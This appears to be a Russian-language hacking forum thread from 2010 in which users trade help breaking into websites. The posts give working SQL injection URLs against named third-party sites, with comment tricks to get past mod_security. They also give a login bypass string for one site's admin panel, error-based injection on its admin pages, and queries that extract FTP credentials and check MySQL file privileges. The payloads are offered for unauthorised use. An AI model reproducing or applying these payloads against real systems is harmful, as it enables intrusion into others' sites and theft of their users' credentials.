11.11.2010, 12:16
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
Вообщем имеется сайт.
Есть доступ к mysql.user, Версия мускула 5.0.32-Debian_7etch8-log
bd работает под root, file_priv Y
Прочитать конфиг сервера через load_file() не получается почемуто = \
Так же в ошибке я вижу путь вида
/home/u1234/site.ru/www/file.php
В бд есть разные интересные таблицы, например нашол таблицу ftpuser с колонками:
id, userid, passwd, uid, gid, homedir
Но проблема в том что я из колонок таким запросом немогу ничего вывести.
+union+select+1,userid,3,4,5,6,7,8,9,10+from+ftpus er+limit+0,1+--+
Причем из любой таблицы и из лбой колонки. При таком запросе мне просто выдает ошибку. Если бы колонки были пустые, ошибки не было бы, просто показывало бы пустоту в 2ечке)
Есть у кого каикие нить соображения как вывести инфу из колонок ? или мб можно что то замутить с Y привилегией? )
значит таблицы в другой базе.
1. Узнаем базу под которой работает необходимая таблица
id=1+union+select+1,2,3,4,5,6,7,8,table_schema+fro m+information_schema.tables+where+table_name='им я_таблицы'--
2. Делаем запрос
id=1+union+select+1,userid,3,4,5,6,7,8,9,10+from+ мя_базы.ftpuser--
|
|
|
11.11.2010, 16:35
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Помогите раскрутить
Не могу вывести колумны. По коунт кол-во 453, могу посмотреть.Вывести не могу.
Стял mod_security, обошел, а вот что еще фильтруется не пойму.
Сообщение от None
http://littlehouseofhats.us/collection_details.php?ID=130'/**/and/**/(1=0)/**//*!union*/+/*!select*/+1,count(column_name),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+from+information_schem a.%60columns%60--+
|
|
|
|
11.11.2010, 16:53
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://littlehouseofhats.us/collection_details.php?ID=-130'+/*!UNION*/+SELECT+COLUMN_NAME,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+FROM+INFORMATION_SCHEM A.COLUMNS+LIMIT+10,1%23
|
|
|
|
11.11.2010, 18:02
|
|
Новичок
Регистрация: 29.08.2010
Сообщений: 19
Провел на форуме:
6784
Репутация:
0
|
|
привет, подскажите в пм вход в админку http://www.fortline.ru/ , пожалуйста
|
|
|
|
11.11.2010, 18:40
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от rooopster
привет, подскажите в пм вход в админку http://www.fortline.ru/ , пожалуйста
https://www.fortline.ru/manager/
+
http://www.fortline.ru/cms/index.php
------------------
LOGIN: 1' or 1=1# 1
PASS: hgfjhgjtgfjthitufikjk
+в админке sql inj.
http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+informa tion_schema.tables+group+by+concat(version(),floor (rand(0)*2)))--+
P.S http://www.fortline.ru/cms/access.php
|
|
|
|
11.11.2010, 19:05
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Сообщение от [Feldmarschall
"]
[Feldmarschall] said:
https://www.fortline.ru/manager/
+
http://www.fortline.ru/cms/index.php
------------------
LOGIN:
1' or 1=1# 1
PASS:
hgfjhgjtgfjthitufikjk
+в админке sql inj.
http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+informa tion_schema.tables+group+by+concat(version(),floor (rand(0)*2)))--+
P.S http://www.fortline.ru/cms/access.php
Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так?
И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
Введите Ваш логин и пароль 1\' or 1=1# 1
Тесть к кавычке подставляет слеш, как обойти?
|
|
|
|
11.11.2010, 20:58
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от MastaBass1
Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так?
И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
Введите Ваш логин и пароль 1\' or 1=1# 1
Тесть к кавычке подставляет слеш, как обойти?
О боже. В наше время, уже доволько редко встречается. В твоем случае, скорее всего там есть фильтрация... скорее всего, даже можеш не пытатся or-ом)).
|
|
|
|
11.11.2010, 23:38
|
|
Познающий
Регистрация: 10.09.2010
Сообщений: 35
Провел на форуме:
8054
Репутация:
0
|
|
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
|
|
|
|
12.11.2010, 00:05
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от Mirrey
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Код:
select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--
|
|
|
|
12.11.2010, 00:06
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Сообщение от None
Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
Проверяем права на запись и чтение файлов
id=1+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user='root'--
Y-есть права
N-нет прав
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2425790){kind=avatar}
Похожие темы
Комбинированный вид
